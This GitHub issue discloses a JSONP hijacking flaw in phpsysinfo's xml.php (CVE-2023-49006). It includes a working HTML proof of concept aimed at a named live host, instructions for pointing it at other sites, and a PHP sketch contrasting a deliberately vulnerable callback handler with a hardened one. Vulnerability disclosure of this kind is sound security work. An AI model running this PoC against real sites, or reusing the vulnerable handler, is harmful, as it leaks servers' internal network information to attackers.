
XML.php JSONP hijacking in phpsysinfo v3.4.3 #5

Open
Hebing123 opened this issue Dec 15, 2023 · 1 comment

Comments

@Hebing123 (Owner) commented Dec 15, 2023

Description

phpsysinfo v3.4.3 has a JSONP vulnerability. The XML.php file has a JSONP hijacking vulnerability. When a user visits a page carefully crafted by the attacker, the JSON data is obtained and sent to the attacker.

Proof of Concept

We created an HTML file as a proof of concept to showcase the vulnerability. This HTML file will attempt to retrieve the JSON data from https://phpbb.trabitechnik.com/xml.php and display it in a pop-up window.

Of course, in a real-world attack, an attacker would simply use a PHP file to send the retrieved JSON data to their server using an XMLHttpRequest.

Here is the HTML code for the proof of concept file:

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>
function dezsbrxdio(data){ alert(JSON.stringify(data)); }
</script>
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script>
</body>
</html>
```

Here are some online assets using phpsysinfo that I have found:

If we want to easily test whether a website is vulnerable to this exploit, we can simply replace "phpbb.trabitechnik.com" in the HTML file (PoC) with the URL of the website we want to test. We can open the modified HTML file and check if a pop-up window is displayed with the JSON data retrieved from the website. If a pop-up window appears with the JSON data, then the website is vulnerable to the JSONP hijacking exploit.

Impact

If a website's internal network information or other sensitive data is exposed through JSONP and vulnerable to hijacking, the consequences could be severe.

An attacker could potentially retrieve sensitive information such as IP addresses, server names, network topologies, and other data that could be used to map out the internal network structure. This information could then be used to identify additional targets within the network and launch more targeted attacks.

In addition, if the website is part of a larger system or network, the attacker could use the information obtained through JSONP hijacking to gain access to other systems or sensitive data within the network.

Overall, the potential consequences of JSONP hijacking are significant and can lead to a range of security issues and data breaches. It is important for website administrators to ensure that their systems are not vulnerable to this exploit and to take appropriate measures to mitigate the risk.

benharvie marked this as fixed in 4f2cee505e4f2e9b369a321063ff2c5e0c34ba45 with commit 4f2cee 4 months ago
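As an added illustration (not phpsysinfo's code and not the contents of the linked fix commit), the PHP below contrasts the response pattern that makes the hijack in this issue possible with a hardened handler that serves plain JSON only and refuses cross-site browser requests. The parameter names follow the PoC; the payload and the `Sec-Fetch-Site` policy are assumptions.

```php
<?php
// Added illustration, not phpsysinfo's code: a minimal endpoint in the style
// of xml.php?json. The payload below is a constructed stand-in for the real data.
$sysinfo = ['hostname' => 'example-host', 'ip' => '10.0.0.5', 'uptime' => 86400];

// Vulnerable pattern: any of the callback parameters used by the PoC turns the
// response into executable JavaScript, so a third-party page can load it with
// <script src=...> and receive the data in its own function.
function serve_jsonp_vulnerable(array $query, array $data): array
{
    foreach (['callback', 'jsonp', 'cb'] as $p) {
        if (isset($query[$p]) && $query[$p] !== '') {
            $body = $query[$p] . '(' . json_encode($data) . ');';
            return [200, ['Content-Type' => 'application/javascript'], $body];
        }
    }
    return [200, ['Content-Type' => 'application/json'], json_encode($data)];
}

// Hardened pattern (assumed policy, not the project's fix):
//  1. never wrap the payload in a callback, so the body is data, not script;
//  2. label it as JSON and forbid sniffing, so browsers will not run it;
//  3. refuse browser requests that originate from another site, using the
//     Sec-Fetch-Site header modern browsers attach (absent for curl and
//     legacy browsers, which is treated here like a direct request).
function serve_json_hardened(array $query, array $headers, array $data): array
{
    $site = $headers['Sec-Fetch-Site'] ?? 'none';
    if (!in_array($site, ['same-origin', 'same-site', 'none'], true)) {
        return [403, ['Content-Type' => 'text/plain'], 'cross-site request refused'];
    }
    foreach (['callback', 'jsonp', 'cb'] as $p) {
        if (isset($query[$p])) {
            // Fail loudly rather than silently ignoring the parameter, so
            // attempts show up in the access log as 400s.
            return [400, ['Content-Type' => 'text/plain'], 'JSONP is not supported'];
        }
    }
    $hdr = ['Content-Type' => 'application/json; charset=utf-8',
            'X-Content-Type-Options' => 'nosniff'];
    return [200, $hdr, json_encode($data)];
}

// The request the PoC page makes (a cross-site <script> load) versus a same-origin fetch.
$poc = ['json' => '', 'callback' => 'dezsbrxdio', 'jsonp' => 'dezsbrxdio', 'cb' => 'dezsbrxdio'];
$fromPoc   = serve_json_hardened($poc, ['Sec-Fetch-Site' => 'cross-site'], $sysinfo);
$fromLocal = serve_json_hardened(['json' => ''], ['Sec-Fetch-Site' => 'same-origin'], $sysinfo);
printf("PoC request: %d %s\n", $fromPoc[0], $fromPoc[2]);
printf("Own page:    %d %s\n", $fromLocal[0], $fromLocal[2]);
```

Older browsers that do not send `Sec-Fetch-Site` are still covered by step 1: without the callback wrapper there is no function call for a cross-site script tag to execute, so the data stays unreadable from another origin.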

@Hebing123 (Owner, Author) commented:

This is the vulnerability exploitation reference for CVE-2023-49006.
